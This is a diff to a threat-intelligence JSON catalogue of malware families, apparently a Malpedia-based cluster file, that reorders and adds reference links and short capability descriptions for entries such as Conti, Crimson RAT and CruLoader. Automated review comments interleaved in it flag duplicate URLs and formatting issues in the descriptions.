+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-2",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf",
+ "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
+ "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx",
+ "https://www.bleepingcomputer.com/news/security/conti-ransomware-gang-takes-over-trickbot-malware-operation/",
+ "https://www.justice.gov/opa/pr/multiple-foreign-nationals-charged-connection-trickbot-malware-and-conti-ransomware",
+ "https://news.sophos.com/en-us/2021/02/16/what-to-expect-when-youve-been-hit-with-conti-ransomware/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022",
+ "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/",
+ "https://yoroi.company/research/conti-ransomware-source-code-a-well-designed-cots-ransomware/",
+ "https://arcticwolf.com/resources/blog/conti-and-akira-chained-together/",
+ "https://news.sophos.com/en-us/2021/02/16/conti-ransomware-attack-day-by-day/",
 "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/",
- "https://www.bleepingcomputer.com/news/security/hhs-conti-ransomware-encrypted-80-percent-of-irelands-hse-it-systems/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf"
+ "https://www.bleepingcomputer.com/news/security/hackers-use-contis-leaked-ransomware-to-attack-russian-companies/",
+ "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/",
+ "https://assets.sentinelone.com/ransomware-enterprise/conti-ransomware-unpacked",
+ "https://damonmccoy.com/papers/Ransomware_eCrime22.pdf",
+ "https://cyware.com/news/ransomware-becomes-deadlier-conti-makes-the-most-money-39e17bae/",
+ "https://news.sophos.com/en-us/2022/02/22/cyberthreats-during-russian-ukrainian-tensions-what-can-we-learn-from-history-to-be-prepared/",
+ "https://twitter.com/AltShiftPrtScn/status/1423188974298861571",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://marcoramilli.com/2021/11/07/conti-ransomware-cheat-sheet/",
+ "https://twitter.com/TheDFIRReport/status/1498642512935800833",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf",
+ "https://www.prodaft.com/m/reports/Conti_TLPWHITE_v1.6_WVcSEtc.pdf",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti",
+ "https://www.youtube.com/watch?v=uORuVVQzZ0A",
+ "https://www.silentpush.com/blog/consequences-the-conti-leaks-and-future-problems",
+ "https://www.zscaler.com/blogs/security-research/conti-ransomware-attacks-persist-updated-version-despite-leaks",
+ "https://arcticwolf.com/resources/blog/karakurt-web",
+ "https://www.prevailion.com/what-wicked-webs-we-unweave/",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti",
+ "https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/",
+ "https://www.coveware.com/blog/2022/1/26/ransomware-as-a-service-innovation-curve",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://www.youtube.com/watch?v=hmaWy9QIC7c",
+ "https://www.trmlabs.com/post/analysis-corroborates-suspected-ties-between-conti-and-ryuk-ransomware-groups-and-wizard-spider",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://blog.qualys.com/vulnerabilities-threat-research/2021/11/18/conti-ransomware",
+ "https://medium.com/@arnozobec/analyzing-conti-leaks-without-speaking-russian-only-methodology-f5aecc594d1b",
+ "https://unit42.paloaltonetworks.com/conti-ransomware-gang/",
+ "https://cocomelonc.github.io/investigation/2022/04/11/malw-inv-conti-2.html",
+ "https://redcanary.com/blog/intelligence-insights-november-2021/",
+ "https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/",
+ "https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/",
+ "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
+ "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
+ "https://intel471.com/blog/conti-leaks-cybercrime-fire-team",
+ "https://www.bleepingcomputer.com/news/security/conti-ransomware-source-code-leaked-by-ukrainian-researcher/",
+ "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/",
+ "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/",
+ "https://securityaffairs.co/wordpress/128190/cyber-crime/conti-ransomware-takes-over-trickbot.html",
+ "https://lifars.com/wp-content/uploads/2021/10/ContiRansomware_Whitepaper.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -19427,9 +20350,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee",
+ "https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks",
 "https://content.fireeye.com/apt/rpt-apt38",
- "https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks",
- "https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks"
+ "https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks"
 ],
 "synonyms": [
 "WHITEOUT"
@@ -19474,8 +20397,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot",
 "https://www.crowdstrike.com/blog/ecrime-ecosystem/",
- "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report_BosonSpider.pdf"
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report_BosonSpider.pdf",
+ "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/"
 ],
 "synonyms": [],
 "type": []
@@ -19488,9 +20411,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.coredn",
- "https://www.symantec.com/security-center/writeup/2018-021216-4405-99#technicaldescription",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/",
 "https://blog.talosintelligence.com/2019/01/fake-korean-job-posting.html",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/",
+ "https://www.symantec.com/security-center/writeup/2018-021216-4405-99#technicaldescription",
 "https://blog.alyac.co.kr/2105",
 "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/#atricle-content"
 ],
@@ -19505,11 +20428,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell",
- "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html",
- "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
 "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf",
+ "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html",
 "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
 "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/",
+ "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
 "http://malware.prevenity.com/2014/08/malware-info.html"
 ],
 "synonyms": [
@@ -19540,8 +20463,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cosmicduke",
- "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf",
- "https://www.cyfirma.com/outofband/cosmicduke-malware-analysis/"
+ "https://www.cyfirma.com/outofband/cosmicduke-malware-analysis/",
+ "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -19554,18 +20477,18 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cotx",
- "https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf",
- "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
- "https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf",
- "https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/",
- "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf",
- "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology",
 "https://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html",
+ "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology",
 "https://www.youtube.com/watch?v=1WfPlgtfWnQ",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf",
 "https://vblocalhost.com/uploads/VB2020-20.pdf",
 "https://vb2020.vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
+ "https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf",
+ "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
+ "https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/",
+ "https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf",
+ "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -19619,8 +20542,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.coviper",
- "https://tccontre.blogspot.com/2020/04/covid19-malware-analysis-with-kill-mbr.html",
- "https://decoded.avast.io/janrubin/coviper-locking-down-computers-during-lockdown/"
+ "https://decoded.avast.io/janrubin/coviper-locking-down-computers-during-lockdown/",
+ "https://tccontre.blogspot.com/2020/04/covid19-malware-analysis-with-kill-mbr.html"
 ],
 "synonyms": [],
 "type": []
@@ -19629,7 +20552,7 @@
 "value": "CoViper"
 },
 {
- "description": "CozyDuke is not simply a malware toolset; rather, it is a modular malware platform formed around\r\na core backdoor component. This component can be instructed by the C&C server to download\r\nand execute arbitrary modules, and it is these modules that provide CozyDuke with its vast array\r\nof functionality. Known CozyDuke modules include:\r\n• Command execution module for executing arbitrary Windows Command Prompt commands\r\n• Password stealer module\r\n• NT LAN Manager (NTLM) hash stealer module\r\n• System information gathering module\r\n• Screenshot module",
+ "description": "CozyDuke is not simply a malware toolset; rather, it is a modular malware platform formed around\r\na core backdoor component. This component can be instructed by the C&C server to download\r\nand execute arbitrary modules, and it is these modules that provide CozyDuke with its vast array\r\nof functionality. Known CozyDuke modules include:\r\n\u2022 Command execution module for executing arbitrary Windows Command Prompt commands\r\n\u2022 Password stealer module\r\n\u2022 NT LAN Manager (NTLM) hash stealer module\r\n\u2022 System information gathering module\r\n\u2022 Screenshot module",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cozyduke",
@@ -19677,10 +20600,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.crat",
- "https://mp.weixin.qq.com/s/2sV-DrleHiJMSpSCW0kAMg",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
 "https://suspected.tistory.com/269",
 "https://blog.talosintelligence.com/2020/11/crat-and-plugins.html",
- "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
+ "https://mp.weixin.qq.com/s/2sV-DrleHiJMSpSCW0kAMg",
 "https://www.secrss.com/articles/18635"
 ],
 "synonyms": [],
@@ -19707,10 +20630,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.credomap",
- "https://securityscorecard.com/research/apt28s-stealer-called-credomap",
- "https://blog.bushidotoken.net/2022/06/overview-of-russian-gru-and-svr.html",
 "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
 "https://cert.gov.ua/article/341128",
+ "https://blog.bushidotoken.net/2022/06/overview-of-russian-gru-and-svr.html",
+ "https://securityscorecard.com/research/apt28s-stealer-called-credomap",
 "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war"
 ],
 "synonyms": [],
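Review bot: The new-side refs list for CredoMap in the `@@ -19707` hunk keeps two entries that differ only by a trailing slash, `https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/` and the same URL without the `/`, and the CryptoLocker list in the `@@ -20076` hunk likewise carries both `http://` and `https://` variants of the secureworks gold-evergreen profile. Since these lists are being regenerated rather than hand-edited (the patch header for this file is not in view, so this is inferred), the import step should normalize scheme and trailing slash before de-duplicating so the clusters stop accumulating near-duplicate references; otherwise dropping the older variant of each pair by hand would suffice here.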
@@ -19771,43 +20694,44 @@
 "value": "Crenufs"
 },
 {
- "description": "",
+ "description": "It was first discovered in 2017 and has since been used to attack organizations around the world. The malware is often distributed through phishing emails or by exploiting vulnerabilities in outdated security software. Once Crimson RAT is installed on a computer, it can be used to steal data, spy on users, and even take control of the infected computers.\r\n\r\nSome of the features of Crimson RAT include:\r\n\r\nRemote control of infected computers\r\nData theft, such as passwords, files, and emails\r\nUser spying\r\nTakeover of infected computers\r\nLocking of infected computers\r\nExtortion of payments",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson",
- "https://securelist.com/transparent-tribe-part-2/98233/",
- "https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html",
+ "https://twitter.com/katechondic/status/1502206599166939137",
 "https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html",
- "https://team-cymru.com/blog/2021/04/16/transparent-tribe-apt-infrastructure-mapping/",
- "https://www.secrss.com/articles/24995",
- "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
- "https://www.bleepingcomputer.com/news/security/hackers-use-modified-mfa-tool-against-indian-govt-employees/",
- "https://s.tencent.com/research/report/669.html",
- "https://www.4hou.com/posts/vLzM",
- "https://www.secureworks.com/research/threat-profiles/copper-fieldstone",
- "https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html",
- "https://cybleinc.com/2021/04/30/transparent-tribe-operating-with-a-new-variant-of-crimson-rat/",
- "https://mp.weixin.qq.com/s/ELYDvdMiiy4FZ3KpmAddZQ",
- "https://labs.k7computing.com/index.php/transparent-tribe-targets-educational-institution/",
- "https://twitter.com/teamcymru_S2/status/1501955802025836546",
- "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
- "https://securelist.com/transparent-tribe-part-1/98127/",
- "https://blog.yoroi.company/research/transparent-tribe-four-years-later",
- "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF",
- "https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html?m=1",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/IoCs_Investigating%20APT36%20or%20Earth%20Karkaddan%20Attack%20Chain%20and%20Malware%20Arsenal.rtf",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://mp.weixin.qq.com/s/AhxP5HmROtMsFBiUxj0cFg",
- "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/Earth%20Karkaddan%20APT-%20Adversary%20Intelligence%20and%20Monitoring%20Report.pdf",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://twitter.com/teamcymru/status/1351228309632385027",
- "https://anchorednarratives.substack.com/p/trouble-in-asia-and-the-middle-east",
- "https://team-cymru.com/blog/2021/07/02/transparent-tribe-apt-infrastructure-mapping-2/",
- "https://www.seqrite.com/blog/operation-honey-trap-apt36-targets-defense-organizations-in-india/",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
 "https://mp.weixin.qq.com/s/xUM2x89GuB8uP6otN612Fg",
- "https://twitter.com/katechondic/status/1502206599166939137"
+ "https://securelist.com/transparent-tribe-part-1/98127/",
+ "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/IoCs_Investigating%20APT36%20or%20Earth%20Karkaddan%20Attack%20Chain%20and%20Malware%20Arsenal.rtf",
+ "https://www.seqrite.com/blog/operation-honey-trap-apt36-targets-defense-organizations-in-india/",
+ "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF",
+ "https://anchorednarratives.substack.com/p/trouble-in-asia-and-the-middle-east",
+ "https://securelist.com/transparent-tribe-part-2/98233/",
+ "https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html",
+ "https://mp.weixin.qq.com/s/AhxP5HmROtMsFBiUxj0cFg",
+ "https://www.4hou.com/posts/vLzM",
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
+ "https://twitter.com/teamcymru_S2/status/1501955802025836546",
+ "https://labs.k7computing.com/index.php/transparent-tribe-targets-educational-institution/",
+ "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
+ "https://team-cymru.com/blog/2021/04/16/transparent-tribe-apt-infrastructure-mapping/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html",
+ "https://www.bleepingcomputer.com/news/security/hackers-use-modified-mfa-tool-against-indian-govt-employees/",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://mp.weixin.qq.com/s/ELYDvdMiiy4FZ3KpmAddZQ",
+ "https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html?m=1",
+ "https://www.secrss.com/articles/24995",
+ "https://cybleinc.com/2021/04/30/transparent-tribe-operating-with-a-new-variant-of-crimson-rat/",
+ "https://twitter.com/teamcymru/status/1351228309632385027",
+ "https://team-cymru.com/blog/2021/07/02/transparent-tribe-apt-infrastructure-mapping-2/",
+ "https://www.secureworks.com/research/threat-profiles/copper-fieldstone",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/Earth%20Karkaddan%20APT-%20Adversary%20Intelligence%20and%20Monitoring%20Report.pdf",
+ "https://s.tencent.com/research/report/669.html",
+ "https://blog.yoroi.company/research/transparent-tribe-four-years-later",
+ "https://www.seqrite.com/blog/transparent-tribe-apt-actively-lures-indian-army-amidst-increased-targeting-of-educational-institutions"
 ],
 "synonyms": [
 "SEEDOOR",
@@ -19836,10 +20760,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cring",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Vulnerability-in-Fortigate-VPN-servers-is-exploited-in-Cring-ransomware-attacks-En.pdf",
- "https://twitter.com/swisscom_csirt/status/1354052879158571008",
- "https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/?cmp=30728",
 "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/?cmp=30728",
+ "https://twitter.com/swisscom_csirt/status/1354052879158571008",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Vulnerability-in-Fortigate-VPN-servers-is-exploited-in-Cring-ransomware-attacks-En.pdf",
 "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html"
 ],
 "synonyms": [],
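Review bot: The new Crimson RAT description in the `@@ -19771` hunk opens with `It was first discovered in 2017` before the subject is ever named, so the first sentence has no antecedent when the entry is displayed on its own; start it with the name, e.g. `Crimson RAT was first discovered in 2017 and has since been used to attack organizations around the world.` The feature list after `Some of the features of Crimson RAT include:` is separated only by raw `\r\n` pairs with no bullets or punctuation, so any consumer that collapses whitespace will run `Remote control of infected computers` straight into `Data theft, such as passwords, files, and emails`; a comma-separated sentence would be safer in a flat string field. `Takeover of infected computers` also restates `Remote control of infected computers`, so one of the two could be dropped.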
@@ -19866,20 +20790,20 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.crosswalk",
- "https://www.youtube.com/watch?v=8x-pGlWpIYI",
- "https://twitter.com/MrDanPerez/status/1159459082534825986",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware",
- "https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/",
- "https://www.youtube.com/watch?v=FttiysUZmDw",
 "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-state-sponsored-espionage-group-targeting-multiple-verticals-with-crosswalk/",
+ "https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/",
 "https://thehackernews.com/2021/01/researchers-disclose-undocumented.html",
- "https://content.fireeye.com/apt-41/rpt-apt41/",
- "https://www.carbonblack.com/2019/09/30/cb-threat-analysis-unit-technical-analysis-of-crosswalk/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
 "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/"
+ "https://twitter.com/MrDanPerez/status/1159459082534825986",
+ "https://www.youtube.com/watch?v=8x-pGlWpIYI",
+ "https://www.carbonblack.com/2019/09/30/cb-threat-analysis-unit-technical-analysis-of-crosswalk/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://www.youtube.com/watch?v=FttiysUZmDw",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
+ "https://content.fireeye.com/apt-41/rpt-apt41/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf"
 ],
 "synonyms": [
 "Motnug",
@@ -19904,6 +20828,19 @@
 "uuid": "48d697ec-aa34-4d98-83e4-17b736d59a85",
 "value": "Croxloader"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cruloader",
+ "https://malwarebookreports.com/cruloader-zero2auto/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "22d90775-cdcc-4c80-bb0a-1503275671c7",
+ "value": "CruLoader"
+ },
 {
 "description": "",
 "meta": {
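Review bot: The new CruLoader entry in the `@@ -19904` hunk lands with `"description": ""` even though the two references it cites (the Malpedia page and the malwarebookreports write-up) are enough to fill in a one-line summary; other entries in this patch, such as Crimson RAT and CryptoWall, gain descriptions, so an empty one here reads as an oversight rather than a convention. If the import tooling emits `""` whenever the upstream source has no description, note that consumers cannot distinguish "no description available" from a deliberately blank value, so a consistent `null` or omitted key (where the cluster schema permits it) would be clearer than the empty string.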
@@ -19923,20 +20860,20 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryakl",
- "https://unit42.paloaltonetworks.com/trigona-ransomware-update/",
- "https://twitter.com/demonslay335/status/971164798376468481",
- "https://ke-la.com/the-ideal-ransomware-victim-what-attackers-are-looking-for/",
- "https://securelist.com/the-return-of-fantomas-or-how-we-deciphered-cryakl/86511/",
- "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/",
- "https://www.telekom.com/en/blog/group/article/lockdata-auction-631300",
+ "https://securelist.com/cis-ransomware/104452/",
 "https://twitter.com/albertzsigovits/status/1217866089964679174",
- "https://hackmag.com/security/ransomware-russian-style/",
- "https://twitter.com/bartblaze/status/1305197264332369920",
+ "https://ke-la.com/the-ideal-ransomware-victim-what-attackers-are-looking-for/",
+ "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
+ "https://www.telekom.com/en/blog/group/article/lockdata-auction-631300",
+ "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/",
+ "https://twitter.com/demonslay335/status/971164798376468481",
 "https://bartblaze.blogspot.com/2016/02/vipasana-ransomware-new-ransom-on-block.html",
 "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx",
- "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
- "https://blog.checkpoint.com/2015/11/04/offline-ransomware-encrypts-your-data-without-cc-communication/",
- "https://securelist.com/cis-ransomware/104452/"
+ "https://unit42.paloaltonetworks.com/trigona-ransomware-update/",
+ "https://hackmag.com/security/ransomware-russian-style/",
+ "https://twitter.com/bartblaze/status/1305197264332369920",
+ "https://securelist.com/the-return-of-fantomas-or-how-we-deciphered-cryakl/86511/",
+ "https://blog.checkpoint.com/2015/11/04/offline-ransomware-encrypts-your-data-without-cc-communication/"
 ],
 "synonyms": [
 "CryLock"
@@ -19963,8 +20900,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypmic",
- "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/",
+ "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/"
 ],
 "synonyms": [],
 "type": []
@@ -19990,24 +20927,24 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot",
- "https://research.openanalysis.net/cryptbot/botnet/yara/config/2023/03/16/cryptbot.html",
- "https://redcanary.com/wp-content/uploads/2021/12/KMSPico-V5.pdf",
- "https://asec.ahnlab.com/en/35981/",
- "https://regmedia.co.uk/2023/04/28/handout_google_cryptbot_complaint.pdf",
- "https://www.bleepingcomputer.com/news/security/malicious-kmspico-installers-steal-your-cryptocurrency-wallets/",
- "https://www.bleepingcomputer.com/news/security/revamped-cryptbot-malware-spread-by-pirated-software-sites/",
- "https://asec.ahnlab.com/en/31683/",
- "https://asec.ahnlab.com/en/31802/",
- "https://asec.ahnlab.com/en/24423/",
- "https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/",
- "https://blog.google/technology/safety-security/continuing-our-work-to-hold-cybercriminal-ecosystems-accountable/",
- "https://experience.mandiant.com/trending-evil-2/p/1",
- "https://fr3d.hk/blog/cryptbot-too-good-to-be-true",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
 "https://asec.ahnlab.com/en/26052/",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
